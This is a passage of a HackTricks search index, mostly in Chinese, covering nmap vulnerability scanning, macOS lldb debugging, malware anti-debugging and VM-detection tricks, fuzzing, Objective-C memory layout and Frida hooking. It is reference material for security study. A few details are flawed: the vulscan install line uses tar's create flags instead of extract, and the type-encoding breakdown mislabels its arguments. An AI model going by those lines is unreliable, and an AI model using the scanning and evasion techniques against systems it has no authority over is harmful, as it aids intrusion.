脚本查看在离线数据库中获得的服务版本(从其他非常重要的地方下载)并返回可能的漏洞。 它使用的数据库有: Scipvuldb.csv | http://www.scip.ch/en/?vuldb Cve.csv | http://cve.mitre.org Osvdb.csv | http://www.osvdb.org Securityfocus.csv | http://www.securityfocus.com/bid/ Securitytracker.csv | http://www.securitytracker.com Xforce.csv | http://xforce.iss.net Exploitdb.csv | http://www.exploit-db.com Openvas.csv | http://www.openvas.org 要下载并安装在 Nmap 文件夹中: wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar -czvf nmap_nse_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/ 您还需要下载数据库包并将其添加到 /usr/share/nmap/scripts/vulscan/。 用法: 要使用所有:sudo nmap -sV --script=vulscan HOST_TO_SCAN。 要使用特定数据库:sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST_TO_SCAN。","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 重点分析","id":"206","title":"重点分析"},"2060":{"body":"在 这篇博客文章 中,你可以找到一个关于如何 debug a running daemon 的示例,该守护进程使用 PT_DENY_ATTACH 来防止调试,即使 SIP 被禁用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » PT_DENY_ATTACH","id":"2060","title":"PT_DENY_ATTACH"},"2061":{"body":"lldb 是 macOS 二进制 
debugging 的事实标准工具。 bash lldb ./malware.bin\\nlldb -p 1122\\nlldb -n malware.bin\\nlldb -n malware.bin --waitfor 您可以在使用 lldb 时设置 intel 风味,通过在您的主文件夹中创建一个名为 .lldbinit 的文件,并添加以下行: bash settings set target.x86-disassembly-flavor intel warning 在 lldb 中,使用 process save-core 转储进程 (lldb) 命令描述run (r)开始执行,直到命中断点或进程终止。process launch --stop-at-entry在入口点停止执行continue (c)继续调试进程的执行。nexti (n / ni)执行下一条指令。此命令将跳过函数调用。stepi (s / si)执行下一条指令。与 nexti 命令不同,此命令将进入函数调用。finish (f)执行当前函数(“帧”)中的其余指令,返回并停止。control + c暂停执行。如果进程已运行 (r) 或继续 (c),这将导致进程在当前执行位置停止。breakpoint (b)b main #任何名为 main 的函数b `main #二进制文件的主函数b set -n main --shlib #指定二进制文件的主函数breakpoint set -r \'\\\\[NSFileManager .*\\\\]$\' #任何 NSFileManager 方法breakpoint set -r \'\\\\[NSFileManager contentsOfDirectoryAtPath:.*\\\\]$\'break set -r . -s libobjc.A.dylib # 在该库的所有函数中断b -a 0x0000000100004bd9br l #断点列表br e/dis #启用/禁用断点breakpoint delete helphelp breakpoint #获取断点命令的帮助help memory write #获取写入内存的帮助regreg readreg read $raxreg read $rax --format <format>reg write $rip 0x100035cc0x/s 将内存显示为以 null 结尾的字符串。x/i 将内存显示为汇编指令。x/b 将内存显示为字节。print object (po)这将打印由参数引用的对象po $raw{dnsChanger = {\\"affiliate\\" = \\"\\";\\"blacklist_dns\\" = ();请注意,Apple 的大多数 Objective-C API 或方法返回对象,因此应通过“打印对象”(po)命令显示。如果 po 没有产生有意义的输出,请使用 x/bmemorymemory read 0x000....memory read $x0+0xf2amemory write 0x100600000 -s 4 0x41414141 #在该地址写入 AAAAmemory write -f s $rip+0x11f+7 \\"AAAA\\" #在地址中写入 AAAAdisassemblydis #反汇编当前函数dis -n #反汇编函数dis -n -b #反汇编函数dis -c 6 #反汇编 6 行dis -c 0x100003764 -e 0x100003768 # 从一个地址到另一个地址dis -p -c 4 # 从当前地址开始反汇编parrayparray 3 (char **)$x1 # 检查 x1 寄存器中的 3 个组件的数组image dump sections打印当前进程内存的映射image dump symtab image dump symtab CoreNLP #获取 CoreNLP 的所有符号的地址 tip 调用 objc_sendMsg 函数时, rsi 寄存器保存方法的名称,作为以 null 结尾的(“C”)字符串。要通过 lldb 打印名称,请执行: (lldb) x/s $rsi: 0x1000f1576: \\"startMiningWithPort:password:coreCount:slowMemory:currency:\\" (lldb) print (char*)$rsi: (char *) $1 = 0x00000001000f1576 \\"startMiningWithPort:password:coreCount:slowMemory:currency:\\" 
(lldb) reg read $rsi: rsi = 0x00000001000f1576 \\"startMiningWithPort:password:coreCount:slowMemory:currency:\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » lldb","id":"2061","title":"lldb"},"2062":{"body":"虚拟机检测 命令 sysctl hw.model 在 主机为 MacOS 时返回 \\"Mac\\",但在虚拟机中返回不同的内容。 一些恶意软件通过玩弄 hw.logicalcpu 和 hw.physicalcpu 的值来检测是否为虚拟机。 一些恶意软件还可以根据 MAC 地址(00:50:56) 检测 机器是否基于 VMware 。 也可以通过简单的代码检查 进程是否正在被调试 : if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)){ //进程正在被调试 } 它还可以调用 ptrace 系统调用,使用 PT_DENY_ATTACH 标志。这 防止 调试器附加和跟踪。 您可以检查 sysctl 或 ptrace 函数是否被 导入 (但恶意软件可能会动态导入它) 正如在这篇文章中所述,“ 击败反调试技术:macOS ptrace 变体 ”: “ 消息 Process # exited with status = 45 (0x0000002d) 通常是调试目标使用 PT_DENY_ATTACH 的明显迹象 ”","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 反动态分析","id":"2062","title":"反动态分析"},"2063":{"body":"核心转储在以下情况下创建: kern.coredump sysctl 设置为 1(默认值) 如果进程不是 suid/sgid 或 kern.sugid_coredump 为 1(默认值为 0) AS_CORE 限制允许该操作。可以通过调用 ulimit -c 0 来抑制核心转储的创建,并通过 ulimit -c unlimited 重新启用它们。 在这些情况下,核心转储根据 kern.corefile sysctl 生成,通常存储在 /cores/core/.%P 中。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 核心转储","id":"2063","title":"核心转储"},"2064":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 模糊测试","id":"2064","title":"模糊测试"},"2065":{"body":"ReportCrash 分析崩溃的进程并将崩溃报告保存到磁盘 。崩溃报告包含可以 帮助开发人员诊断 崩溃原因的信息。 对于在每个用户 launchd 上下文中 运行的应用程序和其他进程 ,ReportCrash 作为 LaunchAgent 运行,并将崩溃报告保存在用户的 ~/Library/Logs/DiagnosticReports/ 中。 对于守护进程、在系统 launchd 上下文中 运行的其他进程 和其他特权进程,ReportCrash 作为 LaunchDaemon 运行,并将崩溃报告保存在系统的 /Library/Logs/DiagnosticReports 中。 如果您担心崩溃报告 被发送到 Apple ,可以禁用它们。如果不担心,崩溃报告可以帮助 找出服务器崩溃的原因 。 bash #To disable crash reporting:\\nlaunchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist\\nsudo launchctl unload -w 
/System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist #To re-enable crash reporting:\\nlaunchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist\\nsudo launchctl load -w /System/Library/LaunchDaemons/com.apple.ReportCrash.Root.plist","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » ReportCrash","id":"2065","title":"ReportCrash"},"2066":{"body":"在 MacOS 中进行模糊测试时,重要的是不要让 Mac 进入睡眠状态: systemsetup -setsleep Never pmset, 系统偏好设置 KeepingYouAwake SSH 断开连接 如果您通过 SSH 连接进行模糊测试,确保会话不会断开是很重要的。因此,请使用以下内容更改 sshd_config 文件: TCPKeepAlive Yes ClientAliveInterval 0 ClientAliveCountMax 0 bash sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist\\nsudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 睡眠","id":"2066","title":"睡眠"},"2067":{"body":"查看以下页面 以了解如何找到哪个应用程序负责 处理指定的方案或协议: macOS File Extension & URL scheme app handlers","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Internal Handlers","id":"2067","title":"Internal Handlers"},"2068":{"body":"这对于查找管理网络数据的进程很有趣: bash dtrace -n \'syscall::recv*:entry { printf(\\"-> %s (pid=%d)\\", execname, pid); }\' >> recv.log\\n#wait some time\\nsort -u recv.log > procs.txt\\ncat procs.txt 或者使用 netstat 或 lsof","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Enumerating Network Processes","id":"2068","title":"Enumerating Network Processes"},"2069":{"body":"bash lldb -o \\"target create `which some-binary`\\" -o \\"settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib\\" -o \\"run arg1 arg2\\" -o \\"bt\\" -o \\"reg read\\" -o \\"dis -s \\\\$pc-32 -c 24 -m -F intel\\" -o \\"quit\\"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 
Libgmalloc","id":"2069","title":"Libgmalloc"},"207":{"body":"根据 这篇文章 ,您可以通过将 /usr/share/nmap/nmap-service-probes 中的所有 totalwaitms 值修改为 300 和 tcpwrappedms 修改为 200 来加速 nmap 服务分析。 此外,未特别定义 servicewaitms 的探测使用默认值 5000 。因此,我们可以为每个探测添加值,或者我们可以 自己编译 nmap 并在 service_scan.h 中更改默认值。 如果您不想在 /usr/share/nmap/nmap-service-probes 文件中更改 totalwaitms 和 tcpwrappedms 的值,可以编辑 解析代码 ,使得 nmap-service-probes 文件中的这些值被完全忽略。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Nmap Summary (ESP) » 加速 Nmap 服务扫描 x16","id":"207","title":"加速 Nmap 服务扫描 x16"},"2070":{"body":"AFL++ 适用于CLI工具 Litefuzz 它“ 可以正常工作 ”与macOS GUI工具。注意一些macOS应用程序有一些特定要求,如唯一的文件名、正确的扩展名,需要从沙盒中读取文件(~/Library/Containers/com.apple.Safari/Data)... 
一些示例: bash # iBooks\\nlitefuzz -l -c \\"/System/Applications/Books.app/Contents/MacOS/Books FUZZ\\" -i files/epub -o crashes/ibooks -t /Users/test/Library/Containers/com.apple.iBooksX/Data/tmp -x 10 -n 100000 -ez # -l : Local\\n# -c : cmdline with FUZZ word (if not stdin is used)\\n# -i : input directory or file\\n# -o : Dir to output crashes\\n# -t : Dir to output runtime fuzzing artifacts\\n# -x : Tmeout for the run (default is 1)\\n# -n : Num of fuzzing iterations (default is 1)\\n# -e : enable second round fuzzing where any crashes found are reused as inputs\\n# -z : enable malloc debug helpers # Font Book\\nlitefuzz -l -c \\"/System/Applications/Font Book.app/Contents/MacOS/Font Book FUZZ\\" -i input/fonts -o crashes/font-book -x 2 -n 500000 -ez # smbutil (using pcap capture)\\nlitefuzz -lk -c \\"smbutil view smb://localhost:4455\\" -a tcp://localhost:4455 -i input/mac-smb-resp -p -n 100000 -z # screensharingd (using pcap capture)\\nlitefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash screensharingd -p -n 100000","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Fuzzers","id":"2070","title":"Fuzzers"},"2071":{"body":"https://www.youtube.com/watch?v=T5xfL9tEg44 https://github.com/bnagy/slides/blob/master/OSXScale.pdf https://github.com/bnagy/francis/tree/master/exploitaben https://github.com/ant4g0nist/crashwrangler","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 更多模糊测试 MacOS 信息","id":"2071","title":"更多模糊测试 MacOS 信息"},"2072":{"body":"OS X 事件响应:脚本和分析 https://www.youtube.com/watch?v=T5xfL9tEg44 https://taomm.org/vol1/analysis.html Mac 恶意软件的艺术:分析恶意软件的指南 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 
加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » 参考文献","id":"2072","title":"参考文献"},"2073":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 内存中的对象","id":"2073","title":"内存中的对象"},"2074":{"body":"CF* 对象来自 CoreFoundation,后者提供了超过 50 种对象类,例如 CFString、CFNumber 或 CFAllocator。 所有这些类都是类 CFRuntimeClass 的实例,其在被调用时会返回 __CFRuntimeClassTable 的索引。CFRuntimeClass 在 CFRuntime.h 中定义: objectivec // Some comments were added to the original code enum { // Version field constants\\n_kCFRuntimeScannedObject = (1UL << 0),\\n_kCFRuntimeResourcefulObject = (1UL << 2), // tells CFRuntime to make use of the reclaim field\\n_kCFRuntimeCustomRefCount = (1UL << 3), // tells CFRuntime to make use of the refcount field\\n_kCFRuntimeRequiresAlignment = (1UL << 4), // tells CFRuntime to make use of the requiredAlignment field\\n}; typedef struct __CFRuntimeClass {\\nCFIndex version; // This is made a bitwise OR with the relevant previous flags const char *className; // must be a pure ASCII string, nul-terminated\\nvoid (*init)(CFTypeRef cf); // Initializer function\\nCFTypeRef (*copy)(CFAllocatorRef allocator, CFTypeRef cf); // Copy function, taking CFAllocatorRef and CFTypeRef to copy\\nvoid (*finalize)(CFTypeRef cf); // Finalizer function\\nBoolean (*equal)(CFTypeRef cf1, CFTypeRef cf2); // Function to be called by CFEqual()\\nCFHashCode (*hash)(CFTypeRef cf); // 
Function to be called by CFHash()\\nCFStringRef (*copyFormattingDesc)(CFTypeRef cf, CFDictionaryRef formatOptions); // Provides a CFStringRef with a textual description of the object// return str with retain\\nCFStringRef (*copyDebugDesc)(CFTypeRef cf);\\t// CFStringRed with textual description of the object for CFCopyDescription #define CF_RECLAIM_AVAILABLE 1\\nvoid (*reclaim)(CFTypeRef cf); // Or in _kCFRuntimeResourcefulObject in the .version to indicate this field should be used\\n// It not null, it\'s called when the last reference to the object is released #define CF_REFCOUNT_AVAILABLE 1\\n// If not null, the following is called when incrementing or decrementing reference count\\nuint32_t (*refcount)(intptr_t op, CFTypeRef cf); // Or in _kCFRuntimeCustomRefCount in the .version to indicate this field should be used\\n// this field must be non-NULL when _kCFRuntimeCustomRefCount is in the .version field\\n// - if the callback is passed 1 in \'op\' it should increment the \'cf\'s reference count and return 0\\n// - if the callback is passed 0 in \'op\' it should return the \'cf\'s reference count, up to 32 bits\\n// - if the callback is passed -1 in \'op\' it should decrement the \'cf\'s reference count; if it is now zero, \'cf\' should be cleaned up and deallocated (the finalize callback above will NOT be called unless the process is running under GC, and CF does not deallocate the memory for you; if running under GC, finalize should do the object tear-down and free the object memory); then return 0\\n// remember to use saturation arithmetic logic and stop incrementing and decrementing when the ref count hits UINT32_MAX, or you will have a security bug\\n// remember that reference count incrementing/decrementing must be done thread-safely/atomically\\n// objects should be created/initialized with a custom ref-count of 1 by the class creation functions\\n// do not attempt to use any bits within the CFRuntimeBase for your reference count; store that in some 
additional field in your CF object #pragma GCC diagnostic push\\n#pragma GCC diagnostic ignored \\"-Wmissing-field-initializers\\"\\n#define CF_REQUIRED_ALIGNMENT_AVAILABLE 1\\n// If not 0, allocation of object must be on this boundary\\nuintptr_t requiredAlignment; // Or in _kCFRuntimeRequiresAlignment in the .version field to indicate this field should be used; the allocator to _CFRuntimeCreateInstance() will be ignored in this case; if this is less than the minimum alignment the system supports, you\'ll get higher alignment; if this is not an alignment the system supports (e.g., most systems will only support powers of two, or if it is too high), the result (consequences) will be up to CF or the system to decide } CFRuntimeClass;","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » CFRuntimeClass","id":"2074","title":"CFRuntimeClass"},"2075":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Objective-C","id":"2075","title":"Objective-C"},"2076":{"body":"Most of the data used by Objective‑C runtime will change during execution, therefore it uses a number of sections from the Mach‑O __DATA family of segments in memory. 
Historically these included: __objc_msgrefs (message_ref_t): 消息引用 __objc_ivar (ivar): 实例变量 __objc_data (...): 可变数据 __objc_classrefs (Class): 类引用 __objc_superrefs (Class): 超类引用 __objc_protorefs (protocol_t *): 协议引用 __objc_selrefs (SEL): selector 引用 __objc_const (...): 类只读数据和其他(希望是)常量数据 __objc_imageinfo (version, flags): 在镜像加载期间使用:当前 Version 为 0;Flags 指定预优化的 GC 支持等 __objc_protolist (protocol_t *): 协议列表 __objc_nlcatlist (category_t): 指向此二进制中定义的 Non-Lazy Categories 的指针 __objc_catlist (category_t): 指向此二进制中定义的 Categories 的指针 __objc_nlclslist (classref_t): 指向此二进制中定义的 Non-Lazy Objective‑C classes 的指针 __objc_classlist (classref_t): 指向此二进制中定义的所有 Objective‑C classes 的指针 它还使用 __TEXT 段中的几个节来存储常量: __objc_methname (C‑String): 方法名 __objc_classname (C‑String): 类名 __objc_methtype (C‑String): 方法类型 现代 macOS/iOS(尤其是 Apple Silicon 上)还将 Objective‑C/Swift 元数据放在: __DATA_CONST: 不可变的 Objective‑C 元数据,可以跨进程以只读方式共享(例如许多 __objc_* 列表现在存放在这里)。 __AUTH / __AUTH_CONST: 包含在 arm64e 上于加载或使用时必须进行认证的指针(Pointer Authentication)的段。你还会在 __AUTH_CONST 中看到 __auth_got,而不是仅有的传统 __la_symbol_ptr/__got。在进行 instrumenting 或 hooking 时,记得要同时考虑现代二进制中的 __got 和 __auth_got 条目。 For background on dyld pre‑optimization (e.g., selector uniquing and class/protocol precomputation) and why many of these sections are \\"already fixed up\\" when coming from the shared cache, check the Apple objc-opt sources and dyld shared cache notes. This affects where and how you can patch metadata at runtime. macOS Universal binaries & Mach-O Format","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Memory sections used","id":"2076","title":"Memory sections used"},"2077":{"body":"Objective‑C uses mangling to encode selector and variable types of simple and complex types: Primitive types use their first letter of the type i for int, c for char, l for long... and use the capital letter in case it\'s unsigned (L for unsigned long). 
Other data types use other letters or symbols like q for long long, b for 位域, B for 布尔值, # for 类, @ for id, * for char *, ^ for 通用指针 and ? for undefined. Arrays, structures and unions use [, { and ( respectively. Example Method Declaration objectivec - (NSString *)processString:(id)input withOptions:(char *)options andError:(id)error; selector 将会是 processString:withOptions:andError: 类型编码 id 被编码为 @ char * 被编码为 * 该方法的完整类型编码为: less @24@0:8@16*20^@24 详细分解 返回类型 (NSString *):编码为 @,长度为 24 self(对象实例):编码为 @,偏移量为 0 _cmd(选择子):编码为 :,偏移量为 8 第一个参数 (char * input):编码为 *,偏移量为 16 第二个参数 (NSDictionary * options):编码为 @,偏移量为 20 第三个参数 (NSError ** error):编码为 ^@,偏移量为 24 通过选择子和编码,你可以重建该方法。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Type Encoding","id":"2077","title":"Type Encoding"},"2078":{"body":"Objective‑C 中的类是具有属性、方法指针等的 C 结构体。可以在 source code 中找到 struct objc_class: objectivec struct objc_class : objc_object {\\n// Class ISA;\\nClass superclass;\\ncache_t cache; // formerly cache pointer and vtable\\nclass_data_bits_t bits; // class_rw_t * plus custom rr/alloc flags class_rw_t *data() {\\nreturn bits.data();\\n}\\nvoid setData(class_rw_t *newData) {\\nbits.setData(newData);\\n} void setInfo(uint32_t set) {\\nassert(isFuture() || isRealized());\\ndata()->setFlags(set);\\n}\\n[...] 
这个类使用 isa 字段的一些位来表示关于类的信息。 然后,该 struct 有一个指向存储在磁盘上的 class_ro_t 结构的指针,后者包含类的属性,例如名称、base methods、properties 和实例变量。在运行时,还会使用一个额外的 class_rw_t 结构来保存可被修改的指针,例如 methods、protocols、properties。 macOS Objective-C","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 类","id":"2078","title":"类"},"2079":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 内存中的现代对象表示 (arm64e, tagged pointers, Swift)","id":"2079","title":"内存中的现代对象表示 (arm64e, tagged pointers, Swift)"},"208":{"body":"Reading time: 18 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » Pentesting IPv6","id":"208","title":"Pentesting IPv6"},"2080":{"body":"在 Apple Silicon 和较新的运行时中,Objective‑C 的 isa 并不总是一个原始的类指针。在 arm64e 上,它是一个打包结构,可能还携带 Pointer Authentication Code (PAC)。根据平台不同,它可能包含诸如 nonpointer、has_assoc、weakly_referenced、extra_rc 等字段,以及类指针本身(可能被移位或带符号)。这意味着盲目地解引用 Objective‑C 对象的前 8 个字节并不总能得到有效的 Class 指针。 在 arm64e 上调试时的实用注意事项: LLDB 在使用 po 打印 Objective‑C 对象时通常会为你去除 PAC 位,但在处理原始指针时可能需要手动去除认证: lldb (lldb) expr -l objc++ -- #include \\n(lldb) expr -l objc++ -- void *raw = ptrauth_strip((void*)0x000000016f123abc, ptrauth_key_asda);\\n(lldb) expr -l objc++ -O -- (Class)object_getClass((id)raw) Mach‑O 中的许多函数/数据指针会位于 __AUTH/__AUTH_CONST,在使用前需要进行认证。如果你在进行 interposing 或 re‑binding(例如 fishhook‑style),请确保除了传统的 __got 之外也处理 __auth_got。 有关语言/ABI 保证以及 Clang/LLVM 提供的 intrinsics 的深入解析,请参见本页末尾的参考资料。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 非指针 isa 
与指针认证 (arm64e)","id":"2080","title":"非指针 isa 与指针认证 (arm64e)"},"2081":{"body":"一些 Foundation 类通过将对象的有效载荷直接编码在指针值中来避免堆分配(tagged pointers)。不同平台的检测方式不同(例如在 arm64 上是最高有效位,而在 x86_64 macOS 上是最低有效位)。tagged 对象在内存中没有常规的 isa;运行时会通过 tag 位解析类。在检查任意 id 值时: 使用运行时 API,而不是直接探查 isa 字段:object_getClass(obj) / [obj class]。 在 LLDB 中,直接 po (id)0xADDR 会正确打印 tagged pointer 实例,因为会咨询运行时以解析类。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Tagged pointer 对象","id":"2081","title":"Tagged pointer 对象"},"2082":{"body":"纯 Swift 类也是对象,其头部指向 Swift 元数据(而不是 Objective‑C 的 isa)。要在不修改进程的情况下检查运行中的 Swift 进程,可以使用 Swift toolchain 的 swift-inspect,它利用 Remote Mirror 库来读取运行时元数据: bash # Xcode toolchain (or Swift.org toolchain) provides swift-inspect\\nswift-inspect dump-raw-metadata \\nswift-inspect dump-arrays \\n# On Darwin additionally:\\nswift-inspect dump-concurrency 在对混合 Swift/ObjC 应用进行逆向时,这对于映射 Swift 堆对象和协议遵从性非常有用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Swift 堆对象与元数据","id":"2082","title":"Swift 堆对象与元数据"},"2083":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 运行时检查速查表 (LLDB / Frida)","id":"2083","title":"运行时检查速查表 (LLDB / Frida)"},"2084":{"body":"从原始指针打印对象或类: lldb (lldb) expr -l objc++ -O -- (id)0x0000000101234560\\n(lldb) expr -l objc++ -O -- (Class)object_getClass((id)0x0000000101234560) 在 breakpoint 中,从指向对象方法的 self 的指针检查 Objective‑C class: lldb (lldb) br se -n \'-[NSFileManager fileExistsAtPath:]\'\\n(lldb) r\\n... 
breakpoint hit ...\\n(lldb) po (id)$x0 # self\\n(lldb) expr -l objc++ -O -- (Class)object_getClass((id)$x0) 转储携带 Objective‑C 元数据的节(注意:许多现在位于 __DATA_CONST / __AUTH_CONST): lldb (lldb) image dump section --section __DATA_CONST.__objc_classlist\\n(lldb) image dump section --section __DATA_CONST.__objc_selrefs\\n(lldb) image dump section --section __AUTH_CONST.__auth_got 读取已知类对象的内存以在反向工程方法列表时转向 class_ro_t / class_rw_t: lldb (lldb) image lookup -r -n _OBJC_CLASS_$_NSFileManager\\n(lldb) memory read -fx -s8 0xADDRESS_OF_CLASS_OBJECT","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » LLDB","id":"2084","title":"LLDB"},"2085":{"body":"Frida 提供高级的运行时桥接,非常适合在没有符号的情况下发现并对实时对象进行插桩: 枚举类和方法,在运行时解析实际类名,并拦截 Objective‑C 选择器: js if (ObjC.available) {\\n// List a class\' methods\\nconsole.log(ObjC.classes.NSFileManager.$ownMethods); // Intercept and inspect arguments/return values\\nconst impl = ObjC.classes.NSFileManager[\'- fileExistsAtPath:isDirectory:\'].implementation;\\nInterceptor.attach(impl, {\\nonEnter(args) {\\nthis.path = new ObjC.Object(args[2]).toString();\\n},\\nonLeave(retval) {\\nconsole.log(\'fileExistsAtPath:\', this.path, \'=>\', retval);\\n}\\n});\\n} Swift bridge: 枚举 Swift 类型并与 Swift 实例交互(需要较新的 Frida;在 Apple Silicon 目标上非常有用)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » Frida (Objective‑C and Swift)","id":"2085","title":"Frida (Objective‑C and Swift)"},"2086":{"body":"Clang/LLVM: Pointer Authentication and the intrinsics (arm64e ABI). https://clang.llvm.org/docs/PointerAuthentication.html Apple objc 运行时头文件(tagged pointers、non‑pointer isa 等),例如 objc-object.h. 
https://opensource.apple.com/source/objc4/objc4-818.2/runtime/objc-object.h.auto.html tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Objects in memory » 参考资料","id":"2086","title":"参考资料"},"2087":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Introduction to x64","id":"2087","title":"Introduction to x64"},"2088":{"body":"x64,也称为 x86-64,是一种主要用于桌面和服务器计算的 64 位处理器架构。它起源于 Intel 生产的 x86 架构,后来被 AMD 采用并命名为 AMD64,现今是个人计算机和服务器中普遍使用的架构。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to x64 » Introduction to x64","id":"2088","title":"Introduction to x64"},"2089":{"body":"x64 在 x86 架构的基础上扩展,具有 16 个通用寄存器 ,标记为 rax、rbx、rcx、rdx、rbp、rsp、rsi、rdi,以及 r8 到 r15。每个寄存器可以存储一个 64 位 (8 字节)值。这些寄存器还具有 32 位、16 位和 8 位的子寄存器,以便于兼容性和特定任务。 rax - 传统上用于 函数的返回值 。 rbx - 通常用作内存操作的 基址寄存器 。 rcx - 常用于 循环计数器 。 rdx - 在各种角色中使用,包括扩展算术操作。 rbp - 堆栈帧的 基指针 。 rsp - 堆栈指针 ,跟踪堆栈的顶部。 rsi 和 rdi - 用于字符串/内存操作中的 源 和 目标 索引。 r8 到 r15 - 在 x64 中引入的额外通用寄存器。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - 